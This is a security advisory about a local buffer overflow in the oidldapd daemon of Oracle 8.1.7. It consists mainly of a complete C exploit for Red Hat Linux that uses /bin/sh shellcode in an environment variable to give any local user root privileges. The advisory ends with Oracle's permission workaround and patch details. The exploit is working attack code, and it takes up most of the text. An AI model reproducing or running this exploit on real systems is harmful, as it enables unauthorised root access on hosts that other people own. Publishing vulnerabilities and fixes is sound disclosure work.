Vulnerability

    Oracle (oidldapd)

Affected

    Oracle 8.1.7

Description

    Following  is  based  on  a  Plazasite  System & Security Division
    Security Advisory by  Juan Manuel Pascual.   oidldapd is a  Oracle
    Internet Directory.   Oracle Ldap Daemon.   The actual version  is
    2.1.1.1

    There is a buffer  overflow in oidldapd that  can be use by  local
    users to obtain  euid of root  user.  Easy  for user oracle.   Any
    user with local access, can gain euid= root.

    /*
    Exploit Code for oidldapd in Oracle 8.1.7 (8ir3) for Linux. I tested in RH 6.2
    and 6.1.

    synopsis: buffer overflow in oidldapd
    impact:   any local user gain euid=root.

    Dedicated to my mentors. Cra & Borja. Thanks for your knowledge and wisdom.
    */




    #include <stdio.h>
    #include <stdlib.h>

    #define DEFAULT_OFFSET                -400
    #define DEFAULT_BUFFER_SIZE             700
    #define NOP                            0x90
    #define ORACLE_HOME		"/work/oracle8ir3"

    char shellcode[] =
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    unsigned long get_sp(void) {
       __asm__("movl %esp,%eax");
    }

    void main(int argc, char *argv[]) {
      char *buff, *ptr,*name[3],environ[100],binary[120];
      long *addr_ptr, addr;
      int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
      int i;


      buff = malloc(bsize);
      addr = get_sp() - offset;
      ptr = buff;
      addr_ptr = (long *) ptr;
      for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;

      for (i = 0; i < bsize/2; i++)
        buff[i] = NOP;

      ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
      for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

      buff[bsize - 1] = '\0';

      memcpy(buff,"EGG=",4);
      putenv(buff);

      sprintf(environ,"ORACLE_HOME=%s",ORACLE_HOME);
      putenv(environ);

      sprintf(binary,"%s/bin/oidldapd connect=$EGG",ORACLE_HOME);
      system(binary);
    }

Solution

    Oracle  recommends   that  customers   implement  the    following
    workaround:  change the file permissions to 710 on the  'oidldapd'
    and 'oidmon'  executables.   These permissions  will limit  access
    (to the executables) to a small, privileged group of users on  the
    host machine.

    Oracle has comprehensively fixed these vulnerabilities in the  OID
    2.0, Release 2.0.6.3, patch set on Solaris and in the  forthcoming
    OID 2.1, Release 2.1.1.1, patch set. The OID 2.0.6.3 patch set  is
    available on  Metalink, Oracle's  Support Services  site.   Oracle
    intends to produce this patch on additional platforms as well.